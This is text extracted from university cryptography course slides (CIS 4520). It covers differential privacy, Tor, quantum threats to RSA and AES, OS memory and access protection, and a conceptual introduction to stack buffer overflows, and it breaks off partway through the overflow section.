Homogeneity Attack
Zipcode Age Disease
Bob
Zipcode Age
476** 2* Heart Disease
47678 27 476** 2* Heart Disease
476** 2* Heart Disease
Background Knowledge 4790* ≥40 Flu
Attack 4790* ≥40 Heart Disease
Carl 4790* ≥40 Cancer
Zipcode Age 476** 3* Heart Disease
47673 36 476** 3* Cancer
476** 3* Cancer
37
CIS 4520
Introduction to
Cryptography
k-Anonymity & Generalization

• Issue: still able to identify individuals in

Wenjing Zhang

databases!
• Improved solutions of k-Anonymity tend
to be ad-hoc
• Differential Privacy
– A rigorous privacy notion

38
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP)
Wenjing Zhang • A theoretical model
– Dataset D and D’ differ on at most one record
– M is a statistical query or a data mining
algorithm

M is ε-differential private, if Pr[M(D) = R] ≤ eε ×Pr[M(D’) = R]

– Indistinguishable results
whether you (or anyone)
are in the dataset or not
– Smaller ε equals stronger privacy

39
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP)
Wenjing Zhang
Key idea: released statistic is about the same if any
individual's record is removed from the database.

40
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP)
Wenjing Zhang • Question: why pairs of datasets that differ in one
row?

41
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Slido

Why pairs of datasets that differ in one row?

42
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP)
Wenjing Zhang • Question: why pairs of datasets that differ in one
row?
• Answer: simulate the presence or absence of a
single record

43
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP)

• Algorithm:
Wenjing Zhang

44
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP)

• Example:
Wenjing Zhang

45
CIS 4520
Introduction to
Cryptography
Differential Privacy (DP): Applications
Wenjing Zhang • Google:
– Launched the first commercial use of DP in 2014.
– Applied it to study malware in Chrome without
gathering private user information.
• Apple:
– Implements DP to collect data in iOS devices.
– Uses this data to improve features like keyboard
suggestions, Spotlight search, and Notes.
– Collects trends in language and emoji use across users
while maintaining individual privacy.
• Microsoft:
– Spearheaded the development of DP.
– Applied DP to telemetry data in Windows.
– Applied DP in LinkedIn for advertiser queries and
suggesting replies within office-related contexts.
46
CIS 4520
Introduction to
Cryptography
Statistical Database Privacy Protection

• We do not have a silver bullet

Wenjing Zhang

• Differential privacy is the state of art

• It is far from perfect

47
CIS 4520
Introduction to
Cryptography
Summary

• Security
Wenjing Zhang

– Encryption,
• e.g., DES, AES, RSA…
– Provide utility only to the key owner
• Privacy
– Data Obfuscation/Perturbation
• e.g., k-anonymity, Differential Privacy
– Provide utility to the public
• Allow researchers to extract knowledge about data

48
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Part 2. Network Anonymity

49
CIS 4520
Introduction to
Cryptography
What is Privacy?

• Privacy as protecting the identity

Wenjing Zhang

– Statistical Database Privacy

• Remove identifiable information from data
– Network Anonymity
• Hide identity on the internet

50
CIS 4520
Introduction to
Cryptography
Privacy on Public Networks
Wenjing Zhang • Internet is designed as a public network
– Wi-Fi access points, network routers see all
traffic that passes through them
• Routing information is public
– IP packet headers identify source and
destination
– Even a passive observer can easily figure out
who is talking to whom
• Frequently visiting websites related to a specific
health condition
• Constant exchange of data between two IP
addresses might suggest a personal relationship
• Frequent requests to location-based services could
indicate a person's whereabouts or routine
slide 51
CIS 4520
Introduction to
Cryptography
Why is Encryption not Enough?
Wenjing Zhang • Encryption does not hide identities
– Encryption hides the payload/message, but
not routing information. Headers are left
exposed. Both to the receiver and attacker.
– Even IP-level encryption (tunnel-mode
IPsec/ESP) reveals IP addresses of IPsec
gateways.
• These addresses can provide clues about the origin
and destination of the data.

slide 52
CIS 4520
Introduction to
Cryptography
Internet Anonymity
Wenjing Zhang
• Unlinkability
– The adversary knows all the senders and
receivers but cannot link senders to receivers
• Sender anonymity
• Receiver anonymity

53
CIS 4520
Introduction to
Cryptography
Anonymity via Random Routing
Wenjing Zhang
• Hide message source through random routing
• Routers cannot definitively determine the
origin/source of the message
– the true sender or another router

54
CIS 4520
Introduction to
Cryptography
Random Routing
Wenjing Zhang • Popular techniques:
– Chaum’s Mix (Chaum 1981)
• Correspondence hiding between sender & receiver
by wrapping messages in layers and relaying
through “mix” routers.
– Onion routing (Syverson et al. 1997)
• Layered encryption using pair-wise symmetric keys
– Crowds (Reiter et al. 1998)
• Probabilistic random walk with probability factor,
hides initiator of traffic through multicast responses
– P5 (Sherwood et al. 2001)
• Dining cryptographer network
– Tarzan, MorphMix, Freedom, Tor, Cashmere,
Salsa, …
55
CIS 4520
Introduction to
Cryptography
Onion Routing

• The term "onion"

Wenjing Zhang

– refers to layers of encryption applied to data as

it travels through the Onion Routing network.
– layers of an onion must be peeled away one by
one to reveal the core
– the data is encrypted multiple times as it passes
through different relays in the network,
creating layers of encryption that are
sequentially decrypted by each relay until the
data reaches its final destination

56
CIS 4520
Introduction to
Cryptography
Onion Routing
Wenjing Zhang • The smart bit is using layered encryption so every
node can only decrypt part of the message.
CIS 4520
Introduction to
Cryptography
Onion Routing
Wenjing Zhang
[Reed, Syverson, Goldschlag 1997]

• Sender chooses a sequence of routers

– Some may be honest, some controlled by attacker
– Sender controls the length of the path
slide 58
CIS 4520
Introduction to
Cryptography
Route Establishment
Wenjing Zhang

(USENIX Security 2004)

R. Dingledine, N. Mathewson, P. Syverson

CIS 4520
Introduction to
Cryptography
Tor
Wenjing Zhang • Deployed onion routing network
– http://torproject.org
– Specifically designed for low-latency anonymous
Internet communications
• Main goal
– Enhances Network security and anonymity by
making it difficult for anyone monitoring the
network to trace the origin and destination of data
• Running since October 2003
– Thousands of relay nodes, 100K-500K? of users
• Easy-to-use client proxy, integrated Web
browser
61
CIS 4520
Introduction to
Cryptography
Why is Encryption not Enough?
Wenjing Zhang • Encryption does not hide identities
– Encryption hides the payload, but not routing
information. Headers are left exposed. Both
to the receiver and attacker.
• Tor protects against traffic analysis, e.g.,
• E-commerce price discrimination based on country.
• Some online retailers might vary prices of products or
services based on the geographic location of the user.
• By using Tor, a user can mask their true location,
making it more challenging for retailers to implement
such price discrimination tactics.

slide 62
CIS 4520
Introduction to
Cryptography
Slides References
Wenjing Zhang

• The University of Texas at Austin CS 380S

Quantum
Computing - A
Threat to OG
Cryptography
- Vaideeshwaran Saravanan
Contents
• Overview
• Cryptography and classical
encryption
• Quantum computing
• Threat toward the cryptography
• Shor’s algorithm
• PQC
• Key takeaways
Overview
Traditional cryptography - Relies on mathematical problems that are difficult to
solve using traditional computers
Quantum computing – Leveraging the concept of quantum for computation

Post quantum cryptography - A field of study focused on developing cryptographic

algorithms resistant to attacks by quantum computers
The advent of powerful quantum computers poses a threat to current cryptography

Exploring the intersection of quantum computing and cryptography are important

for the future secure communication
Cryptography and classical encryption

4
Traditional cryptography
algorithms
• Symmetric encryption --- AES
• Asymmetric encryption -- RSA

[2] [3]
Approx. Prime Count: 10100 / log(10100) = 1.67x1097

6
Prime numbers in
600 digits?
Prime numbers in 600 digits?

N = 600 (Number of Digits)

Largest Number: 10^600 (1 followed by 600 zeros)

Approx. Prime Count: 10100 / log(10100) =

1.67x109710^600 / log(10^600) = 1.67E597
Quantum
computing
• Quantum computing - works on the
principle of Quantum Mechanics -
superposition and entanglement.

• Quantum computers work much

faster than the classical computer.

9
Properties of Quantum
computing

[5]

Superposition Entanglement
[6]
Bits vs Qubits

▪ BITS ▪ QUBITS
▪ Bits are the basic units of classical computing. ▪ Qubits are the basic units of quantum computing.
▪ A bit can represent either a 0 or a 1. ▪ A qubit can exist in a superposition of 0 and 1,
meaning it can represent both states
simultaneously.
▪ Bits are processed sequentially, one at a time. ▪ Qubits can process multiple possibilities in
parallel, allowing for exponential computational
power.
▪ Classical computers perform calculations by ▪ Quantum computers perform calculations by
manipulating and processing bits using logic manipulating and processing qubits using
gates. quantum gates.
▪ The state of a bit is always definite and ▪ The state of a qubit is probabilistic and can only
deterministic. be determined upon measurement.
• Quantum Computing Power: Break widely used
cryptographic algorithms.

Threats • Cryptographic Vulnerability: Solve mathematical problems

toward the rapidly, in which cryptography relies.

cryptography • Data Security Risks: Lead to easily decrypt previous

encrypted data.

• Quantum algorithms: Shor’s algorithm and Groover’s

algorithm

12
Grover’s Algorithm
Grover’s Algorithm
• Quantum Search of unstructured
database Algorithm

• If given database as f(x), and we have

to find x at y, then f(x==y)= 1 and
f(x!=y)==0.

• With this algorithm using quantum, if

the total range of x exits, if the
normal algorithm takes N steps to
find the y, then this algorithm takes
only √N.
How is Grover’s a threat
to AES?
Shor’s Algorithm
Shor’s Algorithm -
Demonstrate
Shor’s
Algorithm
• Shor’s algorithm is a quantum algorithm

• Designed to factorize the large number made with 2

prime numbers.

• Leverages the computational power and parallelism.

18
• Let N be the number that needs to be
factorized.
• And randomly generate the number g,
such that 1<g<N and
gcd(g, N) = 1
How Shor’s • Find p (period) such that,
algorithm f(x)=gx (mod N) => f(x+p)=f(x)
• If p is odd and g(p/2)+1=N, start again by
works? guessing any other number
• And the factors of N are going to be
gcd(g(p/2) ±1, N)
Example

20
Post-quantum
Cryptography (PQC)
Post-quantum
Cryptography (PQC)

• PQC - research to develop cryptographic

algorithms to secure against quantum attacks.

• Explores alternative mathematical problems

and cryptographic techniques for resistance.

23
PQC vs Quantum Cryptography
PQC vs Quantum Cryptography

PQC Quantum Cryptography

Focuses on algorithm design and analysis to develop Focuses on secure communication using quantum
new cryptographic algorithms resistant to attacks from principles, specifically in the context of key distribution
quantum computers. protocols.
Targets encryption, signature, and key exchange Focuses primarily on key distribution protocols and
algorithms for replacement with post-quantum achieving better randomness through quantum.
alternatives.
Main concern is the resistance of cryptographic Main concern is providing security in real-time
algorithms to attacks from quantum computers. communication using quantum principles.
Involves integrating new post-quantum algorithms into Involves the physical implementation of quantum
existing cryptographic systems. principles in communication systems.
Existing examples are lattice-based, code-based, hash- Existing examples are Quantum Key Distribution (QKD)
based, and multivariate polynomial cryptography and Quantum Random Number Generation (QRNG).
Key takeaways
• Cryptography is essential for securing sensitive information through encryption
techniques.
• Quantum computing poses a significant threat to classical encryption algorithms.
• Shor's algorithm, a quantum algorithm, targets the factorization problem
underlying asymmetric encryption schemes like RSA.
• Post-Quantum Cryptography (PQC) focuses on developing encryption algorithms
resistant to quantum attacks.
• PQC solutions are crucial for long-term security in the post-quantum era.
• Transitioning to quantum-resistant algorithms is necessary to mitigate the risks of
quantum computing.
Thank you
Questions?
References

1. https://www.techtarget.com/searchsecurity/definition/cryptography
2. https://www.techtarget.com/searchsecurity/definition/Advanced-
Encryption-Standard
3. https://www.geeksforgeeks.org/rsa-full-form/
4. https://physics.stackexchange.com/questions/582737/has-it-been-
practically-proven-that-quantum-superposition-exists-if-yes-how-d
5. https://news.fnal.gov/2021/04/new-computing-algorithms-expand-
the-boundaries-of-a-quantum-future/
6. https://medium.com/@shivesrini2013/a-brief-intro-to-quantum-
computing-693611da68f3
7. https://www.ssl2buy.com/wiki/symmetric-vs-asymmetric-
encryption-what-are-differences
8. https://www.geeksforgeeks.org/difference-between-encryption-and-
cryptography/
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

CIS 4520 Introduction to Cryptography

Operating System (OS) Security

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Outline

• Introduction
Wenjing Zhang

• Levels of OS Protection
• Memory Protection
• Access Protection
• Access Control
• OS Attacks

2
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

OS Security: Introduction
CIS 4520
Introduction to
Cryptography
Introduction
Wenjing Zhang • Four components of a computer system
CIS 4520
Introduction to
Cryptography
Introduction
Wenjing Zhang • Computer System Structure: can be divided
into four components
– Hardware - provides basic computing resources
• CPU, memory, I/O devices
– Operating system
• Controls and coordinates use of hardware among
various applications and users
– Application programs
• define the ways in which the system resources are
used to solve the computing problems of the users
• Word processors, compilers, web browsers, database
systems, video games
– Users
• People, machines, other computers
CIS 4520
Introduction to
Cryptography
Introduction
Wenjing Zhang • What is an Operating System (OS)?
– A program that acts as an intermediary
between a user of a computer and the computer
hardware
• Operating System goals:
– Execute user programs and make solving user
problems easier
– Make the computer system convenient to use
– Use the computer hardware in an efficient
manner

6
CIS 4520
Introduction to
Cryptography
Introduction
Wenjing Zhang • OS: still software
– All software security vulnerabilities still apply
• OS must protect users from each other by
enforcing:
– memory protection
• prevents unauthorized access to user data or code in
memory
– file protection
• secures private files from unauthorized access
– general control and access to objects
• manages user rights for devices, apps, resources
– user authentication
• verifies the identity of users
7
CIS 4520
Introduction to
Cryptography
Introduction

• The fundamental tradeoff of OS security

Wenjing Zhang

– operating systems tradeoff between:

– Sharing
– Protection

• sharing is desirable
• protection is difficult

8
CIS 4520
Introduction to
Cryptography
Introduction

• Early History
Wenjing Zhang

– no OS
– programs entered directly in binary through
switches
– user’s program only one on system
– user responsible for:
• loading dependent libraries, other tools
• scheduling time to use computer
– OS security?

9
CIS 4520
Introduction to
Cryptography
Introduction

• Later
Wenjing Zhang

– machines very expensive

– people less expensive
– maximize use of machine
– allow many users
– lead to the development of multitasking
operating systems

10
CIS 4520
Introduction to
Cryptography
Introduction

• OS protection – separation
Wenjing Zhang

– Physical separation, e.g. 1 user/printer

– Temporal separation
– Logical separation: user thinks own machine
– Cryptographic separation

– Combinations of these
• OS Security is about reconciling
separation and sharing

11
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

OS Security: Levels of Protection

CIS 4520
Introduction to
Cryptography
Levels of Protection

• no protection
Wenjing Zhang

• isolation
• share all or nothing
• share via access limitation
• share by capabilities
• limit use of an object

13
CIS 4520
Introduction to
Cryptography
Levels of Protection

• No protection
Wenjing Zhang

– e.g. early versions of windows

– some embedded environments

– designed for one user

– no need for isolation, access control, etc.

14
CIS 4520
Introduction to
Cryptography
Uniprogramming w/o memory protection

• Simplest mode of operation for a computer

Wenjing Zhang

• Each application has the entire computer's

resources
• One application runs at a time within a
fixed range of physical memory addresses
no matter we restart the system

15
CIS 4520
Introduction to
Cryptography
Uniprogramming w/o memory protection

• Applications typically use the lower

Wenjing Zhang

memory addresses
• An OS uses the higher memory addresses
• An application can address any physical
memory location

Application Operating system

000000 ffffff

Physical memory
16
CIS 4520
Introduction to
Cryptography
Levels of Protection

• Isolation
Wenjing Zhang

– processes unaware of other processes

– each process: own address space, files, etc.
– OS provides confinement
• ensure that each process stays within its assigned
space and doesn't interfere with its neighbors
• Virtual machines

Application 1 Application 2 Operating system

000000 ffffff

Physical memory
17
CIS 4520
Introduction to
Cryptography
Levels of Protection

• Share all or nothing

Wenjing Zhang

– owner of object declares it:

– Public: available to all users
– Private: not available

– Subject – a user, process, … (something who

is accessing resources)
– Object – a file, device, web page, … (a
resource that can be accessed)

18
CIS 4520
Introduction to
Cryptography
Levels of Protection

• Share via access limitation

Wenjing Zhang

– Resource/files are shared

– Who can access what?
– Access control lists (ACLs)
– Access control matrices
– Capabilities
• tokens or keys that grant certain privileges to a user
or a process

19
CIS 4520
Introduction to
Cryptography
Levels of Protection

• Limit use of an object

Wenjing Zhang

– Sophisticated, fine-grained access control

– Examples:
– can view a file, but can’t print
– given aggregate info from database, but not
individual records

20
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

OS Security: Memory Protection

CIS 4520
Introduction to
Cryptography
Memory Protection

• In a multi-user multi-task environment,

Wenjing Zhang

what’s in the memory?

– OS, processes from different users
– Data (keys!) in plaintext!
• Memory management
– Fences
– Relocation
– Base/Bounds Registers
– Tagged Architecture
– Segmentation
– Paging
– Combined Paging with Segmentation
22
CIS 4520
Introduction to
Cryptography
Memory Protection

• Fences: protect OS from user program

Wenjing Zhang

– confine users to one side of a boundary

– predefined memory address: user code on one
side, OS on the other

OS space
Fence
User space

23
CIS 4520
Introduction to
Cryptography
Memory Protection
Wenjing Zhang • Fences: protect OS from user program
– Problem?
• fixed boundary too restrictive; doesn’t protect users
from each other
– moveable fence: store fence location in register

24
CIS 4520
Introduction to
Cryptography
Memory Protection
Wenjing Zhang
• Relocation
– programs written to run starting at address 0
– can be run at any address
– addresses in source are symbolic:
• e.g., numStudents
– compiler binds these to relocatable addresses.
• e.g. 20 bytes from beginning of module func
– then linker or loader binds to absolute
addresses
• e.g. 20114
– logical addresses mapped to physical by
Memory Management Unit (MMU)
– program never sees real addresses
25
CIS 4520
Introduction to
Cryptography
Memory Protection

• We skip the details of segmentation and

Wenjing Zhang

paging.
• They have been covered in your OS class.

26
CIS 4520
Introduction to
Cryptography
Memory Protection

• Wrap-up
Wenjing Zhang

– Each process
• has its own address space
• thinks it’s the only process on machine
– MMU provides translation between process’s
address space and physical space
– process cannot generate address not in its own
space

27
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

OS Security: Access Protection

CIS 4520
Introduction to
Cryptography
Access Protection
Wenjing Zhang
• Definition:
– Mechanisms within the operating system
– Builds on memory protection/isolation
– Control the level of access that code has to the
system’s resources
– Distinguish between OS operations (kernel
mode) and user applications (user mode)
– Ensures security and prevents unauthorized
access
– Essential for maintaining system stability and
integrity

29
CIS 4520
Introduction to
Cryptography
Access Protection
Wenjing Zhang
• Kernel mode vs. User mode
– fundamental division of execution privileges in
an operating system
– Kernel mode (full privileges):
• OS, drivers, trusted code
• Reference to full memory space
• Unrestricted access to all the resources
– User mode (limited privileges):
• Applications, some drivers
• No direct access to hardware outside allocated space
• Protection rings (x86 architecture)
– Ring 0: Kernel
– Ring 3: User

30
CIS 4520
Introduction to
Cryptography
Access Protection
Wenjing Zhang
• Switching from Kernel mode to User mode
– To run a user program, the kernel:
– Creates a process and initialize the address
space
– Loads the program into the memory
– Initializes translation tables
– Sets the hardware pointer to the translation
table
– Sets the CPU to user mode
– Jumps to the entry point of the program

31
CIS 4520
Introduction to
Cryptography
Access Protection

• Switching from User mode to Kernel mode

Wenjing Zhang

• Voluntary
– System calls: a user process asks the OS to do
something on the process’s behalf
• Involuntary
– Hardware interrupts (e.g., I/O)
– Program exceptions (e.g., segmentation fault)

32
CIS 4520
Introduction to
Cryptography
Access Protection

• For all cases, hardware automatically

Wenjing Zhang

performs the following steps

– Sets the CPU to kernel mode
– Saves the current program counter
– Jumps to the handler in the kernel
• The handler saves old register values

33
CIS 4520
Introduction to
Cryptography
Access Protection

• Context switching between processes

Wenjing Zhang

– Need to save and restore pointers to translation

tables
• To resume process execution
– Kernel reloads old register values
– Sets CPU to user mode
– Jumps to the old program counter

34
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

OS Security: Access Control

CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Control of any kind of object

Wenjing Zhang

• Examples:
– memory
– secondary storage
– hardware devices
– some data structure
– instructions
– passwords and user-authentication mechanism
– the protection mechanism itself

36
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Goals in protecting objects

Wenjing Zhang

– check every access

• user permitted doesn’t mean always permitted
– enforce least privilege
• grant access to minimum set of objects required to
complete a task
– verify acceptable usage
• stack: push(), pop(), …
• Shouldn’t be able to do anything else to stack

37
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Directory
Wenjing Zhang

– not directory as in FS directory

– each user has a list (directory) of objects the
user owns or has access to
– no user should be able to write to the directory
– for each file, directory contains list of
permissions, e.g. R, W, X, and owner

38
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects
Wenjing Zhang

39
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Directory
Wenjing Zhang

– simple *but*
– lists can get very long
• what about shared libraries, programs?
– same item in many lists
– revoking permissions?
• have to go through everyone’s lists

40
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Access Control Lists (ACLs)

Wenjing Zhang

– maintain a list per object, not user

– use wildcards (*) to grant permission to a
group
• e.g. administrator-*

41
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects
Wenjing Zhang

42
CIS 4520
Introduction to
Cryptography
Control of Access to General Objects

• Access Control Matrix

Wenjing Zhang

– row for each user

– column for each protected object

– simple lookups
– but probably lots of empty spaces

43
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

OS Security: Attacks
CIS 4520
Introduction to
Cryptography
Memory Attacks

• Motivation
Wenjing Zhang

– You can encrypt HD, USB drives, network

traffic, etc.
– You cannot encrypt memory!
– A lot of sensitive information: keys,
passwords, etc.
• Two categories of memory attacks
– Software attacks
– Hardware attacks

45
CIS 4520
Introduction to
Cryptography
Memory Attacks

• Software attacks
Wenjing Zhang

– System bugs: allow a process to read any

address, leak (sensitive) information

46
CIS 4520
Introduction to
Cryptography
Memory Attacks

• Software attacks
Wenjing Zhang

– Swap and dump: memory contents are written

to hard drives: swap, core dump, hibernation,
crash reports, etc
• Attackers: trigger a core dump and examine the
dump file, looking for keys.
• It has been reported that core dumps of FTP servers
and email servers contained passwords.
• Hypervisors: suspend the current state of a VM to a
check point file.

47
CIS 4520
Introduction to
Cryptography
Memory Attacks

• Software attacks
Wenjing Zhang

– System bugs: allow a process to read any

address
– Swap and dump: memory contents are written
to hard drives: swap, core dump, hibernation,
crash reports, etc
• Attackers: trigger a core dump and examine the
dump file, looking for keys.
• It has been reported that core dumps of FTP servers
and email servers contained passwords.
• Hypervisors: suspend the current state of a VM to a
check point file.
– Uncleared buffers

48
CIS 4520
Introduction to
Cryptography
Memory Attacks

• Physical attacks
Wenjing Zhang

– Bypass OS, bypass CPU

– Directly read from RAM
– Cold boot attacks
• The remanence effect of RAM: the contents in RAM
fade away gradually after power off in several
minutes or hours (low temperature)
• Attacker: reboot the computer with OS from USB
drive; or move the RAM chips to another machine
• Read from RAM – reduce the temperature so that
data stays longer
• Completely bypass access control, encryption, task
isolation, authentication, etc
– DMA: direct memory access
49
CIS 4520
Introduction to
Cryptography

Wenjing Zhang CIS 4520 Introduction to Cryptography

Introduction to
Software Security

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Part 1. Non-malicious Program Errors

CIS 4520
Introduction to
Cryptography
Introduction

• What is “secure” program?

Wenjing Zhang

– Means different things to different people

• Is it secure if ?
– it strictly adheres to specification
– runs for a long time without failure
– takes too long to break through security
controls
– free from all faults

3
CIS 4520
Introduction to
Cryptography
Faults in Programs

• Murphy’s Law: Anything that can go

Wenjing Zhang

wrong will go wrong.

• Murphy’s Law for software engineering
– Any non-trivial code has bugs
– Bugs are hard to detect and eliminate
– …………
• Not all software bugs lead to security
consequences
– Many of them do
– Many of the consequences are severe

4
CIS 4520
Introduction to
Cryptography
Faults in Programs

• Which is better:
Wenjing Zhang

– finding and fixing 20 faults in a module?

– finding and fixing 100 faults?
• Finding 100 could mean
– you have better testing methods
OR
– code is really bad; 100 were just the tip of the
iceberg
• Software testing literature:
– finding many errors early → probably find
many more

5
CIS 4520
Introduction to
Cryptography
Faults in Programs

• Penetration
Wenjing Zhang

– an authorized simulation of real-world

cyberattacks to uncover security flaws that
could be exploited by hackers
• Fixing Faults: penetrate and patch
– hire tiger team to try to break software
– for each fault:
• release a patch
– bad idea since late 60s.
– why bad?

6
CIS 4520
Introduction to
Cryptography
Faults in Programs
Wenjing Zhang
• Penetrate and patch: why is this bad?
– product was broken in the first place
– developers can only fix problems that they know
about
– patches often only fix symptom. they're not cure
– people don't bother applying the patches
– patches can have holes
– patches might cause bad side effect
– patches tell the bad guys where the problems are
– might affect program performance or limit
functionality
– more expensive than making it secure from the
beginning

7
CIS 4520
Introduction to
Cryptography
Program Security

• Can we make programs completely

Wenjing Zhang

secure?
– Not easy
• Why? Software testing:
– makes sure that code does what it's supposed
to do
– for security: must also verify that it doesn't do
anything it isn't supposed to do. much
harder
– programming techniques often change more
quickly than security techniques

8
CIS 4520
Introduction to
Cryptography
Program Security

• Approaches to find software vulnerabilities

Wenjing Zhang

• Code Review
– Manual code inspection and vulnerability
reasoning
• Static Analysis
– Automated reason the code with static program
analysis
• Dynamic Testing
– Run the software with various inputs and
watch for anomaly

9
CIS 4520
Introduction to
Cryptography
Program Security

• IEEE Terminology
Wenjing Zhang

– error – human action that causes an incorrect

result, may later cause a fault or failure.
– fault – incorrect step, process or data definition
in a program
– failure – system doesn’t behave according to
requirements

– a fault is an inside view - seen by developers

– a failure is an outside view - seen by users

10
CIS 4520
Introduction to
Cryptography
Program Security

• Types of flaws
Wenjing Zhang

– validation error
– domain error
– serialization and aliasing
– inadequate authentication
– boundary condition violation
– other exploitable logic errors

• from Landwehr: Taxonomy of Security

Flaws

11
CIS 4520
Introduction to
Cryptography
Validation Errors

• Not checking validity of

Wenjing Zhang

– function arguments
– function return values
• Examples:
– type of variable
– length of a buffer
– permissions of a file
– other variable properties
– A DNS crash story: “,” in a domain name
• Should validation include checking user
input?
12
CIS 4520
Introduction to
Cryptography
Validation Errors

• “Fat Finger Syndrome”

Wenjing Zhang

– Japanese bank trader sale of a telecom stock

– intention to sell:
– 1 share at 600,000 yen
– actually sold:
– 600,000 shares at 1 yen
– cost company about $256 million

• several other similar examples

13
CIS 4520
Introduction to
Cryptography
Validation Errors

• Quantas Airplane 10/7/2008

Wenjing Zhang

– QF72 from Singapore Changi to Perth.

– “Spike” of bad data sent to flight computer
– Sent plane into nose dive
– Australian Transport Safety Bureau:
• combination of a faulty design in FCPC (flight
control primary computer) software of A330/A340,
and a failure mode affecting one of the aircraft's
three ADIRUs (Air Data Inertial Reference Units)
• inadequate testing and oversight in the aircraft's
avionics system or software design process,
combined with unexpected data patterns, could lead
to incorrect aircraft control commands and
compromise flight safety

14
CIS 4520
Introduction to
Cryptography
Domain Errors

• “holes in the fences”

Wenjing Zhang

– insufficient protection of boundaries

– example: unauthorized user’s ability to read
another user’s files within a multi-user system

15
CIS 4520
Introduction to
Cryptography
Serialization, Aliasing

• Serialization
Wenjing Zhang

– vulnerability offered by asynchronous system

behavior
– example: TOCTTOU flaws
• Aliasing
– when two or more objects may have the same
name

16
CIS 4520
Introduction to
Cryptography
Non-malicious Program Errors

• Buffer Overflow
Wenjing Zhang

– Simple problem
– Known about for decades
– Still very common!
– Account for 50% of all major advisories
issued by CERT/CC in 1999
• The CERT Coordination Center (CERT/CC):
Coordination Center of Computer Emergency
Response Team (CERT)
• Created in response to the Morris worm (interesting
story, we will talk about it later)
• CERT/CC publishes security alerts

17
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Memory organization
Wenjing Zhang

Lower
– Process’s memory Address
– Text: code segment
• Program instructions
Text
• Read only
• Segmentation fault if you
try to write to it Data
– Data segment
• Initialized data: global and
static variables Stack
Higher
• Uninitialized data: BSS Address
• Heap

18
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Memory organization
Wenjing Zhang

– Process’s memory Lower

.text Address
– Text: code segment
• Program instructions .data
• Read only .bss
• Segmentation fault if you
try to write to it heap
– Data segment
heap pointer
• Initialized data: global and
static variables
• Uninitialized data: BSS
stack pointer
• Heap
Stack
Higher
Address
19
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Memory organization
Wenjing Zhang

– Process’s memory Lower

.text Address
– Stack
• Activation records (stack .data
frames) for sub-programs .bss
• Stack variables
– Contiguous block of memory heap
• Top of the stack: pointed to
by the stack pointer (SP) heap pointer

• Bottom of the stack: fixed

address
– CPU instructions to PUSH stack pointer

and POP Stack

Higher
Address
20
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Look into the stack

Wenjing Zhang

– The typical activation record for a function

• Arguments
• Return address
holds value of base
pointer from the • Old EBP (Extended Base Pointer): caller’s EBP
calling function to • Local variables
maintain the chain
of function calls
stack
ESP
tells program where
to go back to once local variables
the function has EBP
finished executing saved EBP
return address
function’s arguments

21
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Function call example:

Wenjing Zhang

void func(int a, int b, int c){

char buf[10];
char cuf[20];
} • push $30
• push $20
• push $10
void main(){
func(10,20,30);
• push return addr
} • push (old) base ptr
• old stack ptr
becomes new base
ptr
• push buf
• push cuf
22
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Function call example:

Wenjing Zhang
• At main()

void func(int a, int b, int c){

char buf[10];
char cuf[20];
}

void main(){
func(10,20,30);
}

ESP
EBP main’s frame
23
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Function call example:

Wenjing Zhang
• push $30
• push $20
void func(int a, int b, int c){ • push $10
char buf[10];
char cuf[20];
}

void main(){
func(10,20,30);
}
ESP
10
20
30
EBP main’s frame
24
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Function call example:

Wenjing Zhang
• push return addr
• push (old) base ptr
void func(int a, int b, int c){ • old stack ptr
char buf[10]; becomes new base
char cuf[20]; ptr.
}

void main(){
ESP, EBP
func(10,20,30);
old base pointer
}
return address (EIP)
10
20
30
main’s frame
25
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• Function call example:

Wenjing Zhang
• push buf
• push cuf
void func(int a, int b, int c){
char buf[10];
ESP
char cuf[20];
} cuf

void main(){ buf

EBP
func(10,20,30);
old base pointer
}
return address (EIP)
10
20
30
main’s frame
26
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• What we can do?

Wenjing Zhang

– Overflow buf:
• with malicious input data?
– Rewrite the ESP
return address
cuf
– Now you can run
any program AAAAAAAAAAA
buf
• As long as you EBP AAAAAAAAAAAAAAA
know where it is old base
AAA pointer
A
• To be executed return A
address
A A A (EIP)
after function 10
finishes 20
• Most of attacks: 30
execute a shell
main’s frame
27
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• So what?
Wenjing Zhang

– Shell runs with same permissions as program

we overflowed!
• Background: more on Unix

28
CIS 4520
Introduction to
Cryptography
Buffer Overflow

